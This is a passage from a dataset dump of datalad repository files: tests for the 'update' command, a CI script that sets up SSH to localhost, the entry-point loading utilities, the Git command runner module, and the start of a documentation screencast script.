ds_src.repo.get_hexsha())\n\n\n# This test depends on the source repo being an un-adjusted branch.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_follow_parentds_subdataset_adjusted_warning(path=None):\n path = Path(path)\n\n ds_src = Dataset(path / \"source\").create()\n ds_src_subds = ds_src.create(\"subds\")\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_subds = Dataset(ds_clone.pathobj / \"subds\")\n maybe_adjust_repo(ds_clone_subds.repo)\n # Note: Were we to save ds_clone here, we would get a merge conflict in the\n # top repo for the submodule (even if using 'git annex sync' rather than\n # 'git merge').\n\n ds_src_subds.repo.call_git([\"checkout\", DEFAULT_BRANCH + \"^0\"])\n (ds_src_subds.pathobj / \"foo\").write_text(\"foo content\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n assert_in_results(\n ds_clone.update(merge=True, recursive=True, follow=\"parentds\",\n on_failure=\"ignore\"),\n status=\"impossible\",\n path=ds_clone_subds.path,\n action=\"update\")\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n\n\n@slow # 12 + 21sec on Yarik's laptop\[email protected](\"on_adjusted\", [True, False])\n# Skip non-adjusted case for systems that only support adjusted branches.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_follow_parentds_subdataset_detached(path=None, *, on_adjusted):\n if on_adjusted and DEFAULT_REMOTE != \"origin\" and \\\n external_versions['cmd:annex'] <= \"8.20210330\":\n raise SkipTest(\n \"'git annex init' with adjusted branch currently fails \"\n \"due to hard-coded 'origin'\")\n\n # Note: For the adjusted case, this is not much more than a smoke test that\n # on an adjusted branch we fail sensibly. The resulting state is not easy\n # to reason about nor desirable.\n path = Path(path)\n # $path/source/s0/s1\n # The additional dataset level is to gain some confidence that this works\n # for nested datasets.\n ds_src = Dataset(path / \"source\").create()\n ds_src_s0 = ds_src.create(\"s0\")\n ds_src_s1 = ds_src_s0.create(\"s1\")\n ds_src.save(recursive=True)\n if on_adjusted:\n # Note: We adjust after creating all the datasets above to avoid a bug\n # fixed in git-annex 7.20191024, specifically bbdeb1a1a (sync: Fix\n # crash when there are submodules and an adjusted branch is checked\n # out, 2019-10-23).\n for ds in [ds_src, ds_src_s0, ds_src_s1]:\n maybe_adjust_repo(ds.repo)\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_s1 = Dataset(ds_clone.pathobj / \"s0\" / \"s1\")\n\n ds_src_s1.repo.checkout(DEFAULT_BRANCH + \"^0\")\n (ds_src_s1.pathobj / \"foo\").write_text(\"foo content\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n res = ds_clone.update(merge=True, recursive=True, follow=\"parentds\",\n on_failure=\"ignore\")\n if on_adjusted:\n # The top-level update is okay because there is no parent revision to\n # update to.\n assert_in_results(\n res,\n status=\"ok\",\n path=ds_clone.path,\n action=\"update\")\n # The subdataset, on the other hand, is impossible.\n assert_in_results(\n res,\n status=\"impossible\",\n path=ds_clone_s1.path,\n action=\"update\")\n return\n assert_repo_status(ds_clone.path)\n\n # We brought in the revision and got to the same state of the remote.\n # Blind saving here without bringing in the current subdataset revision\n # would have resulted in a new commit in ds_clone that reverting the\n # last subdataset ID recorded in ds_src.\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n\n # Record a revision in the parent and then move HEAD away from it so that\n # the explicit revision fetch fails.\n (ds_src_s1.pathobj / \"bar\").write_text(\"bar content\")\n ds_src.save(recursive=True)\n ds_src_s1.repo.checkout(DEFAULT_BRANCH)\n # This is the default, but just in case:\n ds_src_s1.repo.config.set(\"uploadpack.allowAnySHA1InWant\", \"false\",\n scope=\"local\")\n # Configure the fetcher to use v0 because Git defaults to v2 as of\n # v2.26.0, which allows fetching unadvertised objects regardless\n # of the value of uploadpack.allowAnySHA1InWant.\n ds_clone_s1.repo.config.set(\"protocol.version\", \"0\", scope=\"local\")\n res = ds_clone.update(merge=True, recursive=True, follow=\"parentds\",\n on_failure=\"ignore\")\n # The fetch with the explicit ref fails because it isn't advertised.\n assert_in_results(\n res,\n status=\"impossible\",\n path=ds_clone_s1.path,\n action=\"update\")\n\n # Back to the detached head.\n ds_src_s1.repo.checkout(\"HEAD@{1}\")\n # Set up a case where update() will not resolve the sibling.\n ds_clone_s1.repo.call_git([\"branch\", \"--unset-upstream\"])\n ds_clone_s1.config.reload(force=True)\n ds_clone_s1.repo.call_git([\"remote\", \"add\", \"other\", ds_src_s1.path])\n res = ds_clone.update(recursive=True, follow=\"parentds\",\n on_failure=\"ignore\")\n # In this case, update() won't abort if we call with merge=False, but\n # it does if the revision wasn't brought down in the `fetch(all_=True)`\n # call.\n assert_in_results(\n res,\n status=\"impossible\",\n path=ds_clone_s1.path,\n action=\"update\")\n\n\n@with_tempfile(mkdir=True)\ndef test_update_unborn_master(path=None):\n ds_a = Dataset(op.join(path, \"ds-a\")).create()\n ds_a.repo.call_git([\"branch\", \"-m\", DEFAULT_BRANCH, \"other\"])\n ds_a.repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\"])\n ds_b = install(source=ds_a.path, path=op.join(path, \"ds-b\"))\n\n ds_a.repo.checkout(\"other\")\n (ds_a.pathobj / \"foo\").write_text(\"content\")\n ds_a.save()\n\n # clone() will try to switch away from an unborn branch if there\n # is another ref available. Reverse these efforts so that we can\n # test that update() fails reasonably here because we should still\n # be able to update from remotes that datalad didn't clone.\n ds_b.repo.update_ref(\"HEAD\", \"refs/heads/\" + DEFAULT_BRANCH,\n symbolic=True)\n assert_false(ds_b.repo.commit_exists(\"HEAD\"))\n assert_status(\"impossible\",\n ds_b.update(merge=True, on_failure=\"ignore\"))\n\n ds_b.repo.checkout(\"other\")\n assert_status(\"ok\",\n ds_b.update(merge=True, on_failure=\"ignore\"))\n eq_(ds_a.repo.get_hexsha(), ds_b.repo.get_hexsha())\n\n\n@slow # ~25s\n@with_tempfile(mkdir=True)\ndef test_update_follow_parentds_lazy(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_s0 = ds_src.create(\"s0\")\n ds_src_s0_s0 = ds_src_s0.create(\"s0\")\n ds_src_s0.create(\"s1\")\n ds_src_s1 = ds_src.create(\"s1\")\n ds_src.create(\"s2\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_s0 = Dataset(ds_clone.pathobj / \"s0\")\n ds_clone_s0_s0 = Dataset(ds_clone.pathobj / \"s0\" / \"s0\")\n ds_clone_s0_s1 = Dataset(ds_clone.pathobj / \"s0\" / \"s1\")\n ds_clone_s1 = Dataset(ds_clone.pathobj / \"s1\")\n ds_clone_s2 = Dataset(ds_clone.pathobj / \"s2\")\n\n (ds_src_s0_s0.pathobj / \"foo\").write_text(\"in s0 s0\")\n ds_src_s0_s0.save()\n (ds_src_s1.pathobj / \"foo\").write_text(\"in s1\")\n ds_src.save(recursive=True)\n # State:\n # .\n # |-- s0\n # | |-- s0\n # | `-- s1 * matches registered commit\n # |-- s1\n # `-- s2 * matches registered commit\n res = ds_clone.update(follow=\"parentds-lazy\", merge=True, recursive=True,\n on_failure=\"ignore\")\n on_adjusted = ds_clone.repo.is_managed_branch()\n # For adjusted branches, follow=parentds* bails with an impossible result,\n # so the s0 update doesn't get brought in and s0_s0 also matches the\n # registered commit.\n n_notneeded_expected = 3 if on_adjusted else 2\n assert_result_count(res, n_notneeded_expected,\n action=\"update\", status=\"notneeded\")\n assert_in_results(res, action=\"update\", status=\"notneeded\",\n path=ds_clone_s0_s1.repo.path)\n assert_in_results(res, action=\"update\", status=\"notneeded\",\n path=ds_clone_s2.repo.path)\n if on_adjusted:\n assert_in_results(res, action=\"update\", status=\"notneeded\",\n path=ds_clone_s0_s0.repo.path)\n assert_repo_status(ds_clone.path,\n modified=[ds_clone_s0.repo.path,\n ds_clone_s1.repo.path])\n else:\n assert_repo_status(ds_clone.path)\n\n\n@slow # ~10s\n@with_tempfile(mkdir=True)\ndef test_update_follow_parentds_lazy_other_branch(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_sub = ds_src.create(\"sub\")\n ds_src_sub.repo.checkout(DEFAULT_BRANCH, options=[\"-bother\"])\n (ds_src_sub.pathobj / \"foo\").write_text(\"on other branch\")\n ds_src_sub.save()\n ds_src_sub.repo.checkout(DEFAULT_BRANCH)\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_src_sub.repo.checkout(\"other\")\n ds_src.save(recursive=True)\n\n with patch(\"datalad.support.gitrepo.GitRepo.fetch\") as fetch_cmd:\n ds_clone.update(follow=\"parentds\", merge=\"ff-only\",\n recursive=True, on_failure=\"ignore\")\n eq_(fetch_cmd.call_count, 2)\n\n # With parentds-lazy, an unneeded fetch call in the subdataset is dropped.\n with patch(\"datalad.support.gitrepo.GitRepo.fetch\") as fetch_cmd:\n ds_clone.update(follow=\"parentds-lazy\", merge=\"ff-only\",\n recursive=True, on_failure=\"ignore\")\n eq_(fetch_cmd.call_count, 1)\n\n if not ds_clone.repo.is_managed_branch():\n # Now the real thing.\n ds_clone.update(follow=\"parentds-lazy\", merge=\"ff-only\",\n recursive=True)\n ok_(op.lexists(str(ds_clone.pathobj / \"sub\" / \"foo\")))\n\n\n@with_tempfile(mkdir=True)\ndef test_update_adjusted_incompatible_with_ff_only(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n maybe_adjust_repo(ds_clone.repo)\n\n assert_in_results(\n ds_clone.update(merge=\"ff-only\", on_failure=\"ignore\"),\n action=\"update\", status=\"impossible\")\n assert_in_results(\n ds_clone.update(on_failure=\"ignore\"),\n action=\"update\", status=\"ok\")\n\n\[email protected](\"follow,action\", [\n # Ideally each combination would be checked, but this test is a bit slow.\n (\"parentds\", \"reset\"),\n (\"sibling\", \"checkout\"),\n])\n@slow # ~10s\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_update_how_subds_different(path=None, *, follow, action):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_sub = ds_src.create(\"sub\")\n ds_src.save()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n (ds_clone.pathobj / \"foo\").write_text(\"foo\")\n ds_clone.save()\n ds_clone_sub = Dataset(ds_clone.pathobj / \"sub\")\n\n (ds_src_sub.pathobj / \"bar\").write_text(\"bar\")\n ds_src.save(recursive=True)\n\n # Add unrecorded state to make --follow=sibling/parentds differ.\n (ds_src_sub.pathobj / \"baz\").write_text(\"baz\")\n ds_src_sub.save()\n\n ds_clone_repo = ds_clone.repo\n ds_clone_hexsha_pre = ds_clone_repo.get_hexsha()\n\n ds_clone_sub_repo = ds_clone_sub.repo\n ds_clone_sub_branch_pre = ds_clone_sub_repo.get_active_branch()\n\n res = ds_clone.update(follow=follow, how=\"merge\", how_subds=action,\n recursive=True)\n\n assert_result_count(res, 1, action=\"merge\", status=\"ok\",\n path=ds_clone.path)\n assert_result_count(res, 1, action=f\"update.{action}\", status=\"ok\",\n path=ds_clone_sub.path)\n\n ds_clone_hexsha_post = ds_clone_repo.get_hexsha()\n neq_(ds_clone_hexsha_pre, ds_clone_hexsha_post)\n neq_(ds_src.repo.get_hexsha(), ds_clone_hexsha_post)\n ok_(ds_clone_repo.is_ancestor(ds_clone_hexsha_pre, ds_clone_hexsha_post))\n\n eq_(ds_clone_sub.repo.get_hexsha(),\n ds_src_sub.repo.get_hexsha(None if follow == \"sibling\" else \"HEAD~\"))\n ds_clone_sub_branch_post = ds_clone_sub_repo.get_active_branch()\n\n if action == \"checkout\":\n neq_(ds_clone_sub_branch_pre, ds_clone_sub_branch_post)\n assert_false(ds_clone_sub_branch_post)\n else:\n eq_(ds_clone_sub_branch_pre, ds_clone_sub_branch_post)\n\n\n@slow # ~15s\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_update_reset_dirty(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_s1 = ds_src.create(\"s1\")\n ds_src_s2 = ds_src.create(\"s2\")\n ds_src.save()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n\n (ds_src_s1.pathobj / \"foo\").write_text(\"foo\")\n (ds_src_s2.pathobj / \"bar\").write_text(\"bar\")\n ds_src.save(recursive=True)\n\n ds_clone_s1 = Dataset(ds_clone.pathobj / \"s1\")\n ds_clone_s2 = Dataset(ds_clone.pathobj / \"s2\")\n (ds_clone_s1.pathobj / \"dirt\").write_text(\"\")\n\n res = ds_clone.update(follow=\"sibling\", how=\"reset\", recursive=True,\n on_failure=\"ignore\")\n\n assert_result_count(res, 1, path=ds_clone.path,\n action=f\"update.reset\", status=\"error\")\n assert_result_count(res, 1, path=ds_clone_s1.path,\n action=f\"update.reset\", status=\"error\")\n assert_result_count(res, 1, path=ds_clone_s2.path,\n action=f\"update.reset\", status=\"ok\")\n\n # s2 was reset...\n eq_(ds_src_s2.repo.get_hexsha(), ds_clone_s2.repo.get_hexsha())\n # ... but s1 and the top-level dataset stayed behind due to the dirty tree.\n eq_(ds_src.repo.get_hexsha(\"HEAD~\"), ds_clone.repo.get_hexsha())\n eq_(ds_src_s1.repo.get_hexsha(\"HEAD~\"), ds_clone_s1.repo.get_hexsha())\n\n assert_repo_status(ds_clone.path,\n modified=[ds_clone_s1.repo.path,\n ds_clone_s2.repo.path])\n\n\ndef test_process_how_args():\n # --merge maps onto --how values. It has no equivalent of --how-subds,\n # --which just gets set to --how's value when unspecified.\n eq_(_process_how_args(merge=False, how=None, how_subds=None),\n (None, None))\n eq_(_process_how_args(merge=True, how=None, how_subds=None),\n (\"merge\", \"merge\"))\n eq_(_process_how_args(merge=\"any\", how=None, how_subds=None),\n (\"merge\", \"merge\"))\n eq_(_process_how_args(merge=\"ff-only\", how=None, how_subds=None),\n (\"ff-only\", \"ff-only\"))\n\n # Values other than the default --merge=False can not be mixed with\n # non-default how values.\n with assert_raises(ValueError):\n _process_how_args(merge=True, how=\"merge\", how_subds=None)\n with assert_raises(ValueError):\n _process_how_args(merge=True, how=None, how_subds=\"merge\")\n\n # --how-subds inherits the value of --how...\n eq_(_process_how_args(merge=False, how=\"fetch\", how_subds=None),\n (None, None))\n eq_(_process_how_args(merge=False, how=\"merge\", how_subds=None),\n (\"merge\", \"merge\"))\n eq_(_process_how_args(merge=False, how=\"ff-only\", how_subds=None),\n (\"ff-only\", \"ff-only\"))\n # ... unless --how-subds is explicitly specified.\n eq_(_process_how_args(merge=False, how=\"merge\", how_subds=\"fetch\"),\n (\"merge\", None))\n\n\n@with_tempfile(mkdir=True)\ndef test_update_fetch_failure(path=None):\n path = Path(path)\n\n ds_a = Dataset(path / \"ds_a\").create()\n s1 = ds_a.create(\"s1\")\n ds_a.create(\"s2\")\n\n ds_b = install(source=ds_a.path, path=str(path / \"ds-b\"), recursive=True)\n\n # Rename s1 to make fetch fail.\n s1.pathobj.rename(s1.pathobj.parent / \"s3\")\n\n res = ds_b.update(recursive=True, on_failure=\"ignore\")\n assert_in_results(\n res,\n status=\"error\",\n path=str(ds_b.pathobj / \"s1\"),\n action=\"update\")\n assert_in_results(\n res,\n status=\"ok\",\n path=str(ds_b.pathobj / \"s2\"),\n action=\"update\")\n assert_in_results(\n res,\n status=\"ok\",\n path=ds_b.path,\n action=\"update\")\n" }, { "alpha_fraction": 0.6416666507720947, "alphanum_fraction": 0.6416666507720947, "avg_line_length": 19, "blob_id": "3d42aa21e6b36dbd33e1ba22cada2ce69b83245a", "content_id": "da8bbea15ab7205858ede313c3a5cb374c9a7c13", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "permissive", "max_line_length": 49, "num_lines": 6, "path": "/tools/ci/appveyor_ssh2localhost.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -e -u\n\ncat tools/ci/appveyor_ssh_config >> ~/.ssh/config\ncat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys\n" }, { "alpha_fraction": 0.5972180366516113, "alphanum_fraction": 0.600544273853302, "avg_line_length": 34.559139251708984, "blob_id": "eeb94cd733b015ac4064965077622a79f56ff07a", "content_id": "80742b4c25ceb634ee11ed5a26ffe3d4485c33c0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "permissive", "max_line_length": 87, "num_lines": 93, "path": "/datalad/support/entrypoints.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Core utilities\"\"\"\n\nimport logging\nimport sys\n\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger('datalad.support.entrypoints')\n\n\ndef iter_entrypoints(group, load=False):\n \"\"\"Iterate over all entrypoints of a given group\n\n Parameters\n ----------\n group: str\n Name of the entry point group to iterator over, such as\n 'datalad.extensions'.\n load: bool, optional\n Whether to execute the entry point loader internally in a\n protected manner that only logs a possible exception and emits\n a warning, but otherwise skips over \"broken\" entrypoints.\n If False, the loader callable is returned unexecuted.\n\n Yields\n -------\n (name, module, loade(r|d))\n The first item in each yielded tuple is the entry point name (str).\n The second is the name of the module that contains the entry point\n (str). The type of the third items depends on the load parameter.\n It is either a callable that can be used to load the entrypoint\n (this is the default behavior), or the outcome of executing the\n entry point loader.\n \"\"\"\n lgr.debug(\"Processing entrypoints\")\n\n if sys.version_info < (3, 10):\n # 3.10 is when it was no longer provisional\n from importlib_metadata import entry_points\n else:\n from importlib.metadata import entry_points\n for ep in entry_points(group=group):\n if not load:\n yield ep.name, ep.module, ep.load\n continue\n\n try:\n lgr.debug('Loading entrypoint %s from %s', ep.name, group)\n yield ep.name, ep.module, ep.load()\n lgr.debug('Loaded entrypoint %s from %s', ep.name, group)\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\n 'Failed to load entrypoint %s from %s: %s',\n ep.name, group, ce)\n continue\n lgr.debug(\"Done processing entrypoints\")\n\n\ndef load_extensions():\n \"\"\"Load entrypoint for any configured extension package\n\n Log a warning in case a requested extension is not available, or if\n a requested extension fails on load.\n\n Extensions to load are taken from the 'datalad.extensions.load'\n configuration item.\n \"\"\"\n from datalad import cfg\n load_extensions = cfg.get('datalad.extensions.load', get_all=True)\n if load_extensions:\n from datalad.utils import ensure_list\n exts = {\n ename: eload\n for ename, _, eload in iter_entrypoints('datalad.extensions')\n }\n for el in ensure_list(load_extensions):\n if el not in exts:\n lgr.warning('Requested extension %r is not available', el)\n continue\n try:\n exts[el]()\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning('Could not load extension %r: %s', el, ce)\n" }, { "alpha_fraction": 0.518542468547821, "alphanum_fraction": 0.5201583504676819, "avg_line_length": 39.44771194458008, "blob_id": "c0c076eaa0a08412abbdb07da24db16eb3d8e59a", "content_id": "21926641258d6b498d7ba41ddb9c8159e9d69b6b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12377, "license_type": "permissive", "max_line_length": 113, "num_lines": 306, "path": "/datalad/runner/gitrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Runner for command execution within the context of a Git repo\n\"\"\"\n\nimport logging\nimport os\nimport os.path as op\n\nfrom typing import Optional\n\nfrom datalad.dochelpers import borrowdoc\nfrom datalad.utils import (\n generate_file_chunks,\n make_tempfile,\n)\nfrom .runner import (\n GeneratorMixIn,\n WitlessRunner,\n)\n\n\nlgr = logging.getLogger('datalad.runner.gitrunner')\n\n# We use custom ssh runner while interacting with git\nGIT_SSH_COMMAND = \"datalad sshrun\"\n\n\nclass GitRunnerBase(object):\n \"\"\"\n Mix-in class for Runners to be used to run git and git annex commands\n\n Overloads the runner class to check & update GIT_DIR and\n GIT_WORK_TREE environment variables set to the absolute path\n if is defined and is relative path\n \"\"\"\n _GIT_PATH = None\n\n @staticmethod\n def _check_git_path():\n \"\"\"If using bundled git-annex, we would like to use bundled with it git\n\n Thus we will store _GIT_PATH a path to git in the same directory as annex\n if found. If it is empty (but not None), we do nothing\n \"\"\"\n if GitRunnerBase._GIT_PATH is None:\n from shutil import which\n\n # with all the nesting of config and this runner, cannot use our\n # cfg here, so will resort to dark magic of environment options\n if (os.environ.get('DATALAD_USE_DEFAULT_GIT', '0').lower()\n in ('1', 'on', 'true', 'yes')):\n git_fpath = which(\"git\")\n if git_fpath:\n GitRunnerBase._GIT_PATH = ''\n lgr.log(9, \"Will use default git %s\", git_fpath)\n return # we are done - there is a default git avail.\n # if not -- we will look for a bundled one\n GitRunnerBase._GIT_PATH = GitRunnerBase._get_bundled_path()\n lgr.log(9, \"Will use git under %r (no adjustments to PATH if empty \"\n \"string)\", GitRunnerBase._GIT_PATH)\n assert(GitRunnerBase._GIT_PATH is not None) # we made the decision!\n\n @staticmethod\n def _get_bundled_path():\n from shutil import which\n annex_fpath = which(\"git-annex\")\n if not annex_fpath:\n # not sure how to live further anyways! ;)\n alongside = False\n else:\n annex_path = op.dirname(op.realpath(annex_fpath))\n bundled_git_path = op.join(annex_path, 'git')\n # we only need to consider bundled git if it's actually different\n # from default. (see issue #5030)\n alongside = op.lexists(bundled_git_path) and \\\n bundled_git_path != op.realpath(which('git'))\n\n return annex_path if alongside else ''\n\n @staticmethod\n def get_git_environ_adjusted(env=None):\n \"\"\"\n Replaces GIT_DIR and GIT_WORK_TREE with absolute paths if relative path and defined\n \"\"\"\n # if env set copy else get os environment\n git_env = env.copy() if env else os.environ.copy()\n if GitRunnerBase._GIT_PATH:\n git_env['PATH'] = op.pathsep.join([GitRunnerBase._GIT_PATH, git_env['PATH']]) \\\n if 'PATH' in git_env \\\n else GitRunnerBase._GIT_PATH\n\n for varstring in ['GIT_DIR', 'GIT_WORK_TREE']:\n var = git_env.get(varstring)\n if var: # if env variable set\n if not op.isabs(var): # and it's a relative path\n git_env[varstring] = op.abspath(var) # to absolute path\n lgr.log(9, \"Updated %s to %s\", varstring, git_env[varstring])\n\n if 'GIT_SSH_COMMAND' not in git_env:\n git_env['GIT_SSH_COMMAND'] = GIT_SSH_COMMAND\n git_env['GIT_SSH_VARIANT'] = 'ssh'\n git_env['GIT_ANNEX_USE_GIT_SSH'] = '1'\n\n # We are parsing error messages and hints. For those to work more\n # reliably we are doomed to sacrifice i18n effort of git, and enforce\n # consistent language of the messages\n git_env['LC_MESSAGES'] = 'C'\n # But since LC_ALL takes precedence, over LC_MESSAGES, we cannot\n # \"leak\" that one inside, and are doomed to pop it\n git_env.pop('LC_ALL', None)\n\n return git_env\n\n\nclass GitWitlessRunner(WitlessRunner, GitRunnerBase):\n \"\"\"A WitlessRunner for git and git-annex commands.\n\n See GitRunnerBase it mixes in for more details\n \"\"\"\n\n # Behavior option to load up from config upon demand\n _CFG_PATHSPEC_FROM_FILE = None\n\n @borrowdoc(WitlessRunner)\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._check_git_path()\n\n def _get_adjusted_env(self, env=None, cwd=None, copy=True):\n env = GitRunnerBase.get_git_environ_adjusted(env=env)\n return super()._get_adjusted_env(\n env=env,\n cwd=cwd,\n # git env above is already a copy, so we have no choice,\n # but we can prevent duplication\n copy=False,\n )\n\n def _get_chunked_results(self,\n cmd,\n files,\n *,\n protocol=None,\n cwd=None,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n **kwargs):\n\n assert isinstance(cmd, list)\n\n if self._CFG_PATHSPEC_FROM_FILE is None:\n from datalad import cfg # avoid circular import\n GitWitlessRunner._CFG_PATHSPEC_FROM_FILE = cfg.obtain('datalad.runtime.pathspec-from-file')\n assert GitWitlessRunner._CFG_PATHSPEC_FROM_FILE in ('multi-chunk', 'always')\n file_chunks = list(generate_file_chunks(files, cmd))\n\n if pathspec_from_file and (len(file_chunks) > 1 or GitWitlessRunner._CFG_PATHSPEC_FROM_FILE == 'always'):\n # if git supports pathspec---from-file and we need multiple chunks to do,\n # just use --pathspec-from-file\n with make_tempfile(content=b'\\x00'.join(f.encode() for f in files)) as tf:\n cmd += ['--pathspec-file-nul', f'--pathspec-from-file={tf}']\n yield self.run(\n cmd=cmd,\n protocol=protocol,\n cwd=cwd,\n env=env,\n **kwargs)\n return\n\n # \"classical\" chunking\n for i, file_chunk in enumerate(file_chunks):\n # do not pollute with message when there only ever is a single chunk\n if len(file_chunk) < len(files):\n lgr.debug(\n 'Process file list chunk %i (length %i)', i, len(file_chunk))\n\n yield self.run(\n cmd=cmd + ['--'] + file_chunk,\n protocol=protocol,\n cwd=cwd,\n env=env,\n **kwargs)\n\n def run_on_filelist_chunks(self,\n cmd,\n files,\n *,\n protocol=None,\n cwd=None,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n **kwargs):\n \"\"\"\n Run a git-style command multiple times if `files` is too long,\n using a non-generator protocol, i.e. a protocol that is not\n derived from `datalad.runner.protocol.GeneratorMixIn`.\n\n Parameters\n ----------\n cmd : list\n Sequence of program arguments.\n files : list\n List of files.\n protocol : WitlessProtocol, optional\n Protocol class handling interaction with the running process\n (e.g. output capture). A number of pre-crafted classes are\n provided (e.g `KillOutput`, `NoCapture`, `GitProgress`).\n cwd : path-like, optional\n If given, commands are executed with this path as PWD,\n the PWD of the parent process is used otherwise. Overrides\n any `cwd` given to the constructor.\n env : dict, optional\n Environment to be used for command execution. If `cwd`\n was given, 'PWD' in the environment is set to its value.\n This must be a complete environment definition, no values\n from the current environment will be inherited. Overrides\n any `env` given to the constructor.\n pathspec_from_file : bool, optional\n Could be set to True for a `git` command which supports\n --pathspec-from-file and --pathspec-file-nul options. Then pathspecs\n would be passed through a temporary file.\n kwargs :\n Passed to the Protocol class constructor.\n\n Returns\n -------\n dict\n At minimum there will be keys 'stdout', 'stderr' with\n unicode strings of the cumulative standard output and error\n of the process as values.\n\n Raises\n ------\n CommandError\n On execution failure (non-zero exit code) this exception is\n raised which provides the command (cmd), stdout, stderr,\n exit code (status), and a message identifying the failed\n command, as properties.\n FileNotFoundError\n When a given executable does not exist.\n \"\"\"\n\n assert not issubclass(protocol, GeneratorMixIn), \\\n \"cannot use GitWitlessRunner.run_on_filelist_chunks() \" \\\n \"with a protocol that inherits GeneratorMixIn, use \" \\\n \"GitWitlessRunner.run_on_filelist_chunks_items_() instead\"\n\n results = None\n for res in self._get_chunked_results(cmd=cmd,\n files=files,\n protocol=protocol,\n cwd=cwd,\n env=env,\n pathspec_from_file=pathspec_from_file,\n **kwargs):\n if results is None:\n results = res\n else:\n for k, v in res.items():\n results[k] += v\n return results\n\n def run_on_filelist_chunks_items_(self,\n cmd,\n files,\n *,\n protocol=None,\n cwd=None,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n **kwargs):\n \"\"\"\n Run a git-style command multiple times if `files` is too long,\n using a generator protocol, i.e. a protocol that is\n derived from `datalad.runner.protocol.GeneratorMixIn`.\n\n Parameters\n ----------\n see GitWitlessRunner.run_on_filelist_chunks() for a definition\n of parameters\n\n Returns\n -------\n Generator that yields output of the cmd\n \"\"\"\n\n assert issubclass(protocol, GeneratorMixIn), \\\n \"cannot use GitWitlessRunner.run_on_filelist_chunks_items_() \" \\\n \"with a protocol that does not inherits GeneratorMixIn, use \" \\\n \"GitWitlessRunner.run_on_filelist_chunks() instead\"\n\n for chunk_generator in self._get_chunked_results(cmd=cmd,\n files=files,\n protocol=protocol,\n cwd=cwd,\n env=env,\n pathspec_from_file=pathspec_from_file,\n **kwargs):\n yield from chunk_generator\n" }, { "alpha_fraction": 0.7437995672225952, "alphanum_fraction": 0.7565839886665344, "avg_line_length": 58.25757598876953, "blob_id": "ed42cdfa157bfe73546696eac23c8cb26d9f3e98", "content_id": "eaac8d91e99096dc582a553bf850525d6fb047b8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3911, "license_type": "permissive", "max_line_length": 256, "num_lines": 66, "path": "/docs/casts/simple_provenance_tracking.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"It is often helpful to keep track of the origin of data files. When generating data from other data, it is also useful to know what process led to these new data and what inputs were used.\"\nsay \"DataLad can be used to keep such a record...\"\n\nsay \"We start with a dataset\"\nrun \"datalad create demo\"\nrun \"cd demo\"\n\nsay \"Let's say we are taking a mosaic image composed of flowers from Wikimedia. We want extract some of them into individual files -- maybe to use 